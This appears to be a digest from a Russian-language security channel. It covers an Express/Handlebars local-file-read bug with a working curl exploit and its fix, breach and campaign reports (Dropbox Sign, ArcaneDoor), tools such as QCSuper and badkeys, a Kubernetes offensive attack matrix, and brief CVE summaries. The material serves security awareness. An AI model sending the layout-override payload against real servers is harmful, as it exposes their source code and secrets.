Cybred

The Secret Parameter, LFR, and Potential RCE in NodeJS Apps Ставишь ExpressJs с шаблонизатором Handlebars:

npx express-generator
express --view hbs

Бонусом получаешь LFR и, потенциально, RCE. Пример непримечательного кода

var express = require('express');
var router = express.Router();

router.post('/', function(req, res, next) {
  var profile = req.body.profile
   res.render('index', profile)
});

module.exports = router;

А теперь эксплойт для LFR, чтобы прочитать исходники

curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"profile\":{"layout\": \"./../routes/index.js\"}}' 'http://localhost:9090/'

Внутри миддлвары, в процессе рендера, на самом деле существует параметр layout, который получается переопределить, благодаря нашему переданному словарю. С точки зрения кода, вместо

res.render('index', profile)

Правильно использовать

res.render('index', { profile })

Но даже так остается риск эксплуатации с помощью классического Prototype Pollution.

A recent security incident involving Dropbox Sign

Злоумышленники взломали учетную запись службы в бэкенде Sign, у которой были привилегии для выполнения различных действий в продакшн среде. Затем они использовали этот доступ для получения доступа к базе данных клиентов.

В ходе расследования выяснилось, что злоумышленники получили доступ к данным, включая информацию о клиентах: электронную почту, имена пользователей, номера телефонов и хэшированные пароли.

Кроме того, были скомпрометированы настройки информация о настройках, и информация об аутентификации, например, API-ключи, OAuth-токены и данные о многофакторной аутентификации пользователей.

Dropbox Sign взломали и слили всю базу, включая секреты для TOTP. Sign — это сервис, через через который можно шарить и подписывать документы онлайн.

https://github.com/P1sec/QCSuper У процессоров Qualcomm есть полностью проприетарный протокол Diag, DM, или QCDM — который расшифровывается как Qualcomm Diagnostic monitor. Этот протокол обычно используют для отладки, и в Android-смартфонах он тоже есть, — там он представлен интерфейсом /dev/diag. Умеет он много, например: — отдавать информацию об устройстве — выполнять команды, связанные с вызовами и сообщениями — взаимодействовать с GPS — работать с протоколами 2G/3G/4G — менеджить файлы на крошечной EFS — читать и писать в постоянную и энергозависимой память QCSuper — это утилита, которая позволяет взаимодействовать с ним, и использовать некоторые его фичи — например, перехватывать сырой 2G/3G/4G трафик, чтобы проанализировать его в Wireshark. Достаточно иметь рутованный смартфон и подключиться по ADB, вот пример использования sudo ./qcsuper.py --adb --wireshark-live О том, как это работает низкоуровневого, и что можно увидеть в трафике, читаем тут Presenting QCSUPER: A tool for capturing your 2G/3G/4G air traffic on QUALCOMM-based phones.

Cheatsheet: Linux Forensics Analysis Шпаргалка по исследованию потенциально взломанной системы Linux для сбора артефактов. По сути, это готовый copy/paste список действий, которые необходимо выполнить в определенном порядке. Validate compromised — Interviewing client/user/administrator Live response and triage script — Linux-CatScale — UAC — Fennec Live response commands — General information — Logon activities — Review processes — Recover deleted process’s binary — Review network — Review activities — Hunting unusual files — Installed programs — File investigation — Persistent mechanisms — Unusual system resources Compromised assestment scanning — THOR Lite Hunting rootkit — To hunt via 3rd party software — Hunting and check files, processes — Investigate loaded kernel modules Collect evidences — Disk imaging using dd Memory acquisition — AVML — LIME Investigation and analysis — Live response and triage script analysis — Memory analysis with Volatility Disk analysis — Directories and Files Analysis — Log analysis — Privilege escalation hunting ideas — File recovery — Generate Timeline analysis

Godot RE Tools Godot RE Tools — инструмент для реверс-инжиниринга игр, написанных на Godot Engine. Принимает на вход саму игру, в формате pck/exe/apk, на выходе возвращает восстановленный проект, готовый для импорта в игровой движок. Пример использования gdre_tools --headless --recover=game.exe

The Kubenomicon Матрица угроз в стиле MITRE ATTACK для Kubernetes, ориентированная на наступательную безопасность. С акцентом на то, как использовать каждую атаку. 1. Initial access — Using cloud credentials — Compromised image In registry — Kubeconfig file — Application vulnerability — Exposed sensitive interfaces — SSH server running inside container 2. Execution — Exec inside container — New container — Application exploit (RCE) — Sidecar injection 3. Persistence — Backdoor container — Writable hostPath mount — Kubernetes cronjob — Malicious admission controller — Container service account — Static pods 4. Privilege escalation — Privileged container — Cluster-admin binding — hostPath mount — Access cloud resources 5. Defense evasion — Clear container logs — Delete events — Pod name similarity — Connect from proxy server 6. Credential access — List K8S secrets — Access node information — Container service account — Application credentials in configuration files — Access managed identity credentials — Malicious admission controller 7. Discovery — Access Kubernetes API server — Access Kubelet API — Network mapping — Exposed sensitive interfaces — Instance Metadata API 8. Lateral movement — Access cloud resources — Container service account — Cluster internal networking — Application credentials in configuration files — Writable hostPath mount — CoreDNS poisoning — ARP poisoning and IP spoofing 9. Collection — Images from a private registry — Collecting data from pod

ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices Кто-то ломает Cisco, Cisco Talos бьет тревогу. Некий правительственный актор (как предполагает компания, китайцы или россияне) уже пять месяцев терроризирует промышленную инфраструктуру, взламывая брандмауэры ASA (CVE-2024-20353) и FTD (CVE-2024-20359). Получив доступ, внутри разворачивется имплант Line Dancer, который отключает системные логи, хукает hash dump процесс (чтобы заблокировать создание дампа), и устанавливает бекдор, — который переопределяет указатель со стандартного кода host-scan-reply (участвует при создании сеанса SSL VPN) на собственный интерпретатор шеллкода. В январе уже массово взламывали сервера Ivanti Connect Secure, которые некоторые связывают с этой же группой.

https://github.com/badkeys/badkeys Опенсорсная утилита, которая проверяет публичные ключи на наличие известных уязвимостей, с помощью которых можно было бы восстановить приватные ключи. Успешные примеры использования: — атака Ферма на RSA: слабые RSA-ключи, сгенерированные прошивкой принтера, были тривиально взломаны с помощью алгоритма факторизации Ферма. — сертификаты с ключами ROCA: публичные ключи, которые использовала Yahoo, были уязвимы для атаки ROCA. — сертификаты с тестовыми ключами OpenSSL: утилита нашла сертификаты, для которых были известны приватные ключи. Существует веб-версия https://badkeys.info/

CVE-2024-21111 Повышение привилегий до SYSTEM с помощью VirtualBox. Эксплуатация Arbitrary File Write/Delete с помощью симлинков, \RPC Control\, в связке с DLL Hijacking. Ресерч: https://www.mdsec.co.uk/2024/04/cve-2024-21111-local-privilege-escalation-in-oracle-virtualbox/

CVE-2024-2448 RCE в балансировщике LoadMaster, который широко используется в Amazon, Disney, ASOS, и других компаниях. Ресерч: https://rhinosecuritylabs.com/research/cve-2024-2448-kemp-loadmaster/